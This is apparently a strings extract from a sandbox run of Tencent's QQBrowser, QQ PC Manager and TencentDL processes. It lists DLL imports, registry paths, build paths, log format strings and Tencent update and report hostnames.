{8BA986DA-5100-405E-AA35-86F34A02ACBF}BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
ntdll.dll
pipe\
Bkernel32.dll
kernelbase.dll
\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Ckernel32.dll
gdi32.dll
xntdll.dll
wow_helper.exe"
Crash Reports
script.log
resources.pak
chrome
pepflashplayer.dll
${windows}\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
error %u
hunspecified-crash-key
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
rpcrt4.dll
%s\%s.dmp
x-x-x-xx-xxxxxx
InnerDoBugReport
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
problem-url
kernelBase.dll
Ndebug.log
\StringFileInfo\xx\%ls
advapi32.dll
%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe
9.3.7078.400
QQBrowser_exe
QQBrowser.exe
TsService.exe_3568:
QQBrowser.exe_4064:
QQBrowser.exe_1252:
QQBrowser.exe_3504:
QQBrowser.exe_3504_rwx_37B0A000_000F5000:
QQBrowser.exe_3504_rwx_3FC0A000_00037000:
QQBrowser.exe_3576:
QQBrowser.exe_3600:
tencentdl.exe_3840:
QQBrowserLiveup.exe_1808:
QQPCRTP.exe_2840:
.PA_W
.?AV?$CSingleton@VCReportManager@QMReportMgr@@@utils@@
.?AVCReportManager@QMReportMgr@@
5.17499.219\QQPCRTP.exe
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
explorer.exe
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\ProductName
QQFileFlt.dll
\\.\Global\%s
\\.\%s
QQPCMgr.exe
"{0}\{1}"QQPCRtp
\Imm32.dll
\ptrate.dll
QQPCRTP
Global\{9F07EDA1-EF07-47e7-A7EE-59069A1247DD}QQPCTray.exe
"{0}\{1}" {2}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\Microsoft\Windows\CurrentVersion
QMHips.dll
QMHipsEngine.dll
!QMRtpCheck.dll
%s\%s
\QMDns.dll
..\scc.dll
..\TAVEng.dll
QMSafeboxPlugin.dll
..\QQPCHardware.dll
..\QMFileMon.dll
..\TAVCache.dll
..\QMUl.dll
QMRepairPlugin.dll
QQPCNetFlow.exe
Global\com.tencent.qqpcmgr.sysoptimize.single.mutex
QQPCSysOptimize.exe
Global\{8C0CCCAE-1B9C-4c93-96BC-F8DE034FB952}sqlite.dll
QMTrayPlugin\QMPerfCtrl\QMPerf.dll
eGlobal\TAV_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}SYSTEM\CurrentControlSet\services\QQPCRTP
{04CE0CB6-CDF3-4a4b-8B9D-292A455FAF5B}"{0}\{1}"{E11173AE-6007-4a43-811E-6069470B72E6}{84B48DA1-935E-457d-9566-68C2222F9609}QQPCMgrUpdate.exe
"{0}\{1}{2}" {3}QQPCTAVSrv.exe
QQPCUpdateAVLib.exe
QQPCClinic.exe
QMSafeShut.exe
ntdll.dll
EXPLORER.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
QQPCLeakScan.exe
"{0}\{1}" {2} {3}\RefuseInject.dll
AperfLogConf.ini
Global\{A4F31C01-A8C8-40ba-BC77-7E8BF6049F58}Global\{388F581B-10BF-4918-8A80-565FDC0D6D2D}Global\{2FF8DD38-1192-4fde-BCDA-C20DB962F403}QMIpc.dll
@QMWebFW.DLL
RtpPerfLog: before loading %s
RtpPerfLog: after loading %s
RtpPerfLog: before init %s
RtpPerfLog: after init %s
SendLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabledPostLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabledPostLoopbackMessage FAILED, MSGID:{0}/{0}/{1}/{2}SendIpcMessage Begin, MSGID:{0}, TARGET:{1}SendIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabledPostIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled/%d/%d/%d
PipeServer::ReleaseTunnel()
0 is an invalid value for completionKey
Pipe Broken
CIOCompletionPort::PostStatus() - PostQueuedCompletionStatus
Global\{17ED6DA0-0902-461c-B763-F00FF209066B}Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}ErrLogFile.log
C:\ErrLogFile.log
QQQuickLoginInfo
QQLoginInfo
Failed to call RtlGetVersion(), err=%d, RtlGetVersion=%p
Windows version: %d.%d.%d (sp %d)
okernel32.dll
dr.dll
%u.%u.%u.%u
11.5.17490.219
QMCommon.dll
Load QMCommon.dll failed, path=%S
11,5,17490,219
QQPCTray.exe_3088:
.text
`.rdata
@.data
.rsrc
@.reloc
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
Init start value %d
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMPerfMon\QMPerfMon.cpp
InsertPerfMonItem: [error] start value %d
InitPerfMon [ok]: module:%s
InitPerfMon [error]: module:%s
PerfMonDuring bSucc:%d Id:%d Session:%d module:%s
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Output\BinFinal\QQPCTray.pdb
SHLWAPI.dll
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
.17499.219\QQPCTray.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="QQPCMgr" processorArchitecture="X86" type="win32" version="1.0.0.0"></assemblyIdentity><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.ATL" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency></assembly>
Global\{88B0D764-B5C3-4c4a-958F-B76524517744}Global\{00B0D764-B5C4-414a-458F-993573939483}\ptrate.dll
QMMain.dll
QQPCMgr.rdb
QQPCCommonMgr.rdb
\RefuseInject.dll
sAppLaunch.%d.prf
AppLaunch.prf
Num of Files:%d
Num of Sec:%d, File:%s
Rec d info size:%d
AppPrefLog.log
QMCommon.dll
Load QMCommon.dll failed, path=%S
QQPCMgr.exe
QQPCTray.exe
QQPCRTP.exe
perfLogConf.ini
Global\{A4F31C01-A8C8-40ba-BC77-7E8BF6049F58}Global\{388F581B-10BF-4918-8A80-565FDC0D6D2D}Global\{2FF8DD38-1192-4fde-BCDA-C20DB962F403}Global\{17ED6DA0-0902-461c-B763-F00FF209066B}Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}ErrLogFile.log
C:\ErrLogFile.log
11.5.17490.219
11,5,17490,219
QQPCTray.exe_3088_rwx_0023C000_00001000:
keysvc
QQPCTray.exe_3088_rwx_02F67000_00001000:
RSA Signature Key
RSA KeyExchange Key
Using your private exchange key to decrypt
Signing data with your private exchange key
Creating a new RSA signature key
Creating a new RSA exchange key
DSS Signature Key
DH KeyExchange Key
Creating a new DSS signature key
Creating a new Diffie-Hellman exchange key
Using your Diffie-Hellman exchange key to create an agreed key
Migrating keys to new storage
Deleting your private signature key
Deleting your private exchange key
Deleting your old private signature key for migration purposes
Deleting your old private exchange key for migration purposes
Signing data with your private signature key
Exporting your private exchange key
Exporting your private signature key
Importing a new private exchange key
Importing a new private signature key
CryptoAPI Private Key
qmdl.exe_5168:
.text
`.rdata
@.data
.rsrc
@.reloc
Detect Last Crash Time: %u, Disable Xendl Engine
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\CrashMonitor.cpp
KeyValue
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\DownloadEngine\QMDownloadCenterMgr.cpp
OnDownloadFileSize: TaskID: 0x%x FileSize is %d
OnDownloadPercent failed, TaskInfo not found, Engine=%d,TaskID=%d
OnDownloadComplete: Local network is closed, not try next engine, Task[%u] failed
Engine[%u] download task[%u] failed, error: %u
New Engine[%u] Create task[%u] success, Restore SpeedLimit[%u]!
New Engine[%u] Create task[%u] failed!
OnDownloadComplete: AppTaskId: %u Complete ErrorCode is %d
Engine[%u] CreateTask: AppTaskId: %u, EngineTaskId: %u, TotalTask: %u
DeleteTask: AppTaskId: %u, EngineTaskId: %u, Engine: %u
Set Task[%u] Download Speed: %u
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\DownloadEngine\engine_xf\AsynXFDownload.cpp
CAsynXFDownload: InitCallbackWindow failed: %u
CAsynXFDownload: Create thread failed: %u
HandleCreateTask error, stFileInfo.strUrl or stFileInfo.strFileName is empty.
DeleteTask, taskid=0x%x
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\DownloadEngine\engine_xf\QMXFDownload.cpp
XFDownload TryReloadEngine failed, bucause reload count = %u
TryReloadEngine return %u, Reload count = %u
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\DownloadEngine\engine_xf\XFDownload.cpp
CreateTask error, task url is exist[%s].
CreateTask result: hr=0x%x
CreateHttpDownload
DestroyHttpDownload
%u Tasks: %uKB/s
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\QMDldClient.cpp
ClientProcess: PID %d Is Bad Quit
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\QMDldClientMgr.cpp
OnTimerCheckIdleExit: LastActiveTime %d
Message Window is 0x08%x
OnRequest: ProcessId: %u, MsgId:%u
OnResponse: PID %d BADREQUEST
masterconn11.qq.com
Task [%u] Speed limit: %uKB
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMDL\QMDldClientTask.cpp
DeleteTask[%p]: id=%u, error=%u,
CreateTask[%p]: id=%u, Speed=%uKB
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMReportMgr\QMReportMgr.cpp
InitCommonData, ProductID=%d, ClientVersion=%I64d
CreateIReportClient
ReleaseIReportClient
QMEnumLoginQQ
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Output\BinFinal\QMDL.pdb
WS2_32.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCreateKeyExW
RegCloseKey
RegOpenKeyW
RegDeleteKeyW
RegFlushKey
RegEnumKeyExW
RegNotifyChangeKeyValue
RegGetKeySecurity
RegSetKeySecurity
RegQueryInfoKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
VERSION.dll
IMM32.dll
PSAPI.DLL
QMDL.exe
.?AVCQMIpcPipe@IPC@@
.?AVCQMDLHttpDownload@@
.?AVCHttpDownloadSink@@
.?AV?$CKeyValue@G@svrlib@@
.?AV?$CSingleton@VCReportManager@QMReportMgr@@@utils@@
.?AVCReportManager@QMReportMgr@@
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
B\RefuseInject.dll
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\ProductName
QMIpc.dll
DownloadProxy.Downloader.1
Global\{416FCF35-5ADB-4312-B26B-2A82D35479F7}\QMDns.dll
ConfigProxyPort
ConfigProxyPassword
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
AutoConfigURL
Engine[%u] create task failed!, url=%s
CreateTask: %s
uDeleteTaskInfo, m_uiAppTaskId=%d, m_uiEngineTaskId=%d, strUrl=%s
@{1254F62A-1124-40cc-AF56-D7556C170214}{F294CCDA-8F1C-493c-ADE2-29ABFBBD25C2}ExistsSoftMgrMutex(): mutex %s exists
CAsynXFDownload::HandleInit(): customer id = %d
gCreateTask, url=%s, filename=%s, return taskid=0x%x
@CB_FILENAME: %s
{%X-%X-%X-%X-%X%X}CLSID\%s\LocalServer32
Tencentdl.exe
CreateProcess failed: %s, err: %d
dlcore.dll
@{2830B861-B3F1-4222-ABB8-0D733953197D}Global\{17ED6DA0-0902-461c-B763-F00FF209066B}Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}ErrLogFile.log
C:\ErrLogFile.log
QQQuickLoginInfo
QQLoginInfo
ntdll.dll
Failed to call RtlGetVersion(), err=%d, RtlGetVersion=%p
Windows version: %d.%d.%d (sp %d)
okernel32.dll
dr.dll
%u.%u.%u.%u
11.5.17490.219
QMCommon.dll
Load QMCommon.dll failed, path=%S
QQPCMgr.exe
QQPCTray.exe
QQPCRTP.exe
11,5,17490,219
QQPCTray.exe_3088_rwx_08EFF000_00001000:
Windows Update
tencentdl.exe_4132:
.text
`.rdata
@.data
.rsrc
@.reloc
[%s]: %s,
asio.ssl
asio.misc
D:\src\QQMiniDL_proj\trunk\thirdparty\boost_1_44_0_build\include\boost-1_44\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.ssl error
fs-report.qq.com
fs-h2u.qq.com
fs-conn.qq.com
fs-hello.qq.com
xuanfengnet.qq.com
stun.qq.com
fs-tcp-conn.qq.com
pdlxf.qq.com
thread.exit_event
thread.entry_event
TencentDL exe Delay Exit seconds:%d
hXXp://
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
%s\Connection
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}VVV.tencent.com.
HTTP/1.1
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
xf_update.request_t
xf_update.response_t
.\NewUpdate\NewUpdateMgr.cpp
TencentVer = %s, DlcoreVer = %s
Windows
Save File To %s
Response.url_info.cookies = %s
Response.url_info.ref = %s
Response.url_info.url = %s
Response.filesize = %I64d
Response.version = %s
Response.name = %s
Response.enable = %d
UniAttribute not found key:
mini-update.xf.qq.com
xf_update_svr.get_update_strategy
Request.guid = %s
Request.lanuage = %s
Request.custom_id = %d
Request.os = %s , sp = %s, os_bit = %s is_admin = %d
Request.uin = %I64d
Request.version = %s
Request.source = %s
/tencentdlinstallinfo/dtrp?v=1&&format=json&&product=tencentdlinstallinfo&&cmd=1
dtrp.tencentdlinstallinfo.qq.com
.\ReportInstall\ReportInstall.cpp
ReportInstall::CReportInstall::ReportInstallInfo
Install Info = %s
</%s>
<!--%s-->
standalone="%s"
encoding="%s"
version="%s"
X;
%s='%s'
%s="%s"
PKEY_CUSTOMNAME
PKEY_PRODUCTNAME
PKEY_ISSHOW
PKEY_EXITTIME
PKEY_CUSTOMID
PKEY_START_STATUS
PKEY_GUID
PKEY_MINORVERSION
PKEY_MAJORVERSION
PKEY_COREVERSION
PKEY_EXEVERSION
PKEY_DUMPTIME
PKEY_DUMPUPLOADENABLE
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERIP
xf-com-update-doctor.qq.com
PKEY_TTL
PKEY_ISFIX
PKEY_VERSION
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_NAME
PKEY_FILEBT_HASH
PKEY_FILEBT_SIZE
PKEY_FILEBT_NAME
PKEY_FILECORE_HASH
PKEY_FILECORE_SIZE
PKEY_FILECORE_NAME
PKEY_URL
PKEY_PERIOD
PKEY_RESULT
kernel32.dll
.mixcrt
KERNEL32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagVisual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
112.90.140.6
112.90.140.7
IsNetworkOK %d
rand mod %d != 0
lc.tencent.com
addrinfo %s
appname=%s&ver=%lu&pid=%lu&random=%d
sendto %d
recvfrom %d
recvfrom fail len wrong %d
recv %x %x
127.0.0.1
0.0.0.0
d:\src\tencentdl\Tencentdl_v130\Output\Release\Tencentdl.pdb
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpQueryInfoW
HttpEndRequestW
HttpSendRequestExW
HttpAddRequestHeadersW
HttpOpenRequestW
WININET.dll
GetProcessHeap
CreateIoCompletionPort
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyW
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
IMM32.dll
VERSION.dll
NetWkstaTransportEnum
NETAPI32.dll
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
WINTRUST.dll
CertGetNameStringW
CRYPT32.dll
PSAPI.DLL
iphlpapi.dll
'DownloadProxy.EXE'
DownloadProxy.Downloader.1 = s 'Downloader Class'
CLSID = s '{70DE12EA-79F4-46bc-9812-86DB50A2FD64}'DownloadProxy.Downloader = s 'Downloader Class'
CurVer = s 'DownloadProxy.Downloader.1'
ForceRemove {70DE12EA-79F4-46bc-9812-86DB50A2FD64} = s 'Downloader Class'ProgID = s 'DownloadProxy.Downloader.1'
VersionIndependentProgID = s 'DownloadProxy.Downloader'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'stdole2.tlbWWW
cuiMsgTypeWWW
pMsgParamWWWd
6|pTaskUrl
Created by MIDL version 6.00.0366 at Mon Aug 04 10:31:43 2014
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="2.0.0.0" processorArchitecture="X86" name="Tencent.TecentDL" type="win32"></assemblyIdentity><description></description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
Lkernel32.dll
Extract.dll
L[%s]: %s,
version.ini
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
.\Downloader\DownloadDispatcher.cpp
ATNProxy.dll
= %s,
qqdownload_config.xml
dlcore.dll
A.\Downloader\DownloaderMgr.cpp
CDownloaderMgr::SetHangMiniDumpReport
bNeedReport=%d, wait hang time =%d seconds
, uiCustomID=%u, bShowWnd=%d, strProdName=%s, sub_custom_name=%s
\tencentdl.exe
RaiseException, code:%x
CDownloaderMgr::HandleUnregister, uiCallbackPtr=%u, pid=%u, customid=%u
CDownloaderMgr::HandleUnregister, uiCallbackPtr=%u
CDownloaderMgr::Unregister, bIsDownloader=%d
CDownloaderMgr::HandleRegister, oInitParam.uiProcessID=%u, oInitParam.uiCustomID=%u
CDownloaderMgr::Register, bIsDownloader:%d
OnCheckExitTimer return, m_bStarted=%d
, m_bSetWndShow=%d, m_bUpdateMgrReg=%d
OnCheckExitTimer but m_DownloaderPtrMap Not empty, so return, m_bCanExit=%d
OnCheckClientAliveTimer return, m_bStarted:%d
dTencentDL exe Delay Exit, Set timer seconds=%d, m_bCanExit=%d, m_uiFutureExitTime=%u ms, m_uiDelayExitTime=%u ms
, m_bCanExit=%d, m_uiFutureExitTime=%u ms, m_uiDelayExitTime=%u ms
m_DownloaderPtrMap is empty, m_uiFutureExitTime=%u, m_uiDelayExitTime=%u
, pid=%u, customid=%u
HandleStart end, m_uiExeVersion:%u,m_uiCoreVersion:%u
CDownloaderMgr::Start, m_uiExeVersion=%d
DownloadProxy.Downloader.1
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}CLSID\%s\LocalServer32
Tencentdl.exe
C.tlb
Mscoree.dll
\bugreport.exe
bugreport_xf.exe
\Tencentdl.exe
\Installlog.txt
MiniDownload.dll
tinyxml.dll
DownloadProxyPS.dll
extract.dll
tnproxy.dll
regsvr32.exe
\bugreport_xf.exe
\DownloadProxyPS.dll
.\DownloadProxy.cpp
TencentDL tMain, filename:%s, cmd:%s
Kernel32.dll
D\StringFileInfo\xx\
netsh.exe
\\.\PhysicalDrive%d
\\.\Scsi%d:
oiphlpapi.dll
s.\NewUpdate\NewUpdateMgr.cpp
dns error! return 0. update server mini-update.xf.qq.com
uiRet = %d
nM-%.2d-%.2d %.2d:%.2d:%.2d
Unknown ProcessID. PID = %d
No pid option found in CmdLine
Content-Length: %d
\downloadproxyps.dll
\extract.dll
\tnproxy.dll
\dlcore.dll
oInstallInfo.xml
\Global.db
CUpdateMgr uiCustomID:%u,uiExitTime:%u ms, uiShowUI:%d strProdName:%s,strCustomName:%s
.\Update\UpdateMgr.cpp
uiErr:%u
NCUpdateMgr uiEnableDump:%u,uiDumpWaitTime:%u, strIP:%s,port:%d
PCUpdateMgr::OnComLoginServer
OnComLoginServer uiErr:%u
CUpdateMgr m_uiExeVersion:%u,m_uiCoreVersion:%u, m_oLoginServerAddr:%s,port:%d
LUserDataInfo.ini
L.tlg
g%s%s%s
H.\TXLog\Log.cpp
%*.*f
: %s/s
%s: %s
\TDConfig.ini
H\set.log
bugreport /buginfo:%p:%p:%p:%lu /extinfo:%p
ntdll.dll
SOFTWARE\Tencent\bugReport\
\\.\PhysicalDrive0
c:\program files\common files\tencent\qqdownload\130\tencentdl.exe
(1-10240)
1, 0, 130, 4
QQPCNetFlow.exe_4328:
.text
`.rdata
@.data
.rsrc
@.reloc
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\QMNetMonMainUI.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\ConfigNetMon.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\Tool3GFluxUI.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\ToolNetConnUI.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\ToolNetFluxUI.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMExe\QMNetMonExe\Logical2UI\ToolSpeedTestUI.cpp
Init start value %d
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMPerfMon\QMPerfMon.cpp
InsertPerfMonItem: [error] start value %d
InitPerfMon [ok]: module:%s
InitPerfMon [error]: module:%s
PerfMonStart:bSucc:%d Id:%d Session:%d module:%s
PerfMonEnd:bSucc:%d Id:%d Session:%d module:%s
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
--%s--
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\NetFluxControlConfig.cpp
Log.cfg
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\NetFluxControl.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\FileQuery\CFileQueryMgrImp.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\AsyncTask\CMyWindowBase.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\speedprotcontrol.cpp
masterconn11.qq.com
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\MobileFluxControl.cpp
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Config\NetflowConfig.cpp
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\ftbjsafeapp\qmlib\qmnetflowlogic\config\NetflowNormalConfig.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Config\NetflowNormalConfig.cpp
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\ftbjsafeapp\qmlib\qmnetflowlogic\base\netconn\ProviderImp.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\TestNetSpeed.cpp
[%d] InternetWriteFile Failed : index = %d
[NETTEST] Error on InternetWriteFile 0x%x
[%d] Error on InternetWriteFile sSendHeadData Size=%d , 0x%x
[%d] Error on HttpEndRequest Error 0x%x
[%d] HttpEndRequest Ok 0x%x
uptest.dat
X:X:X:X:X:X
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\AsyncTask\CAsyncThread.cpp
d:\jenkins_trunk\workspace\11.5patch_sourcejob\qqpcmgr_proj\ftbjsafeapp\qmlib\qmnetflowlogic\base\filequery\TAVEngineWrap.h
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\FileQuery\TAVUiLogic3.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Module\SpeedLimitAlgorithm.cpp
AllocateAndGetTcpExTableFromStack
AllocateAndGetUdpExTableFromStack
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\NetConn\NetWorkConnection.cpp
GetExtendedTcpTable
GetExtendedUdpTable
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\AsyncTask\CMyMessageLoop.cpp
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\ftbjsafeapp\QMLib\QMNetflowLogic\Base\AsyncTask\CMyMessageLoopProxyImpl.cpp
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMReportMgr\QMReportMgr.cpp
InitCommonData, ProductID=%d, ClientVersion=%I64d
CreateIReportClient
ReleaseIReportClient
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
QMOpenURL
QMSearchKeyWord
QMEnumLoginQQ
QMGetIconFromCmdLine
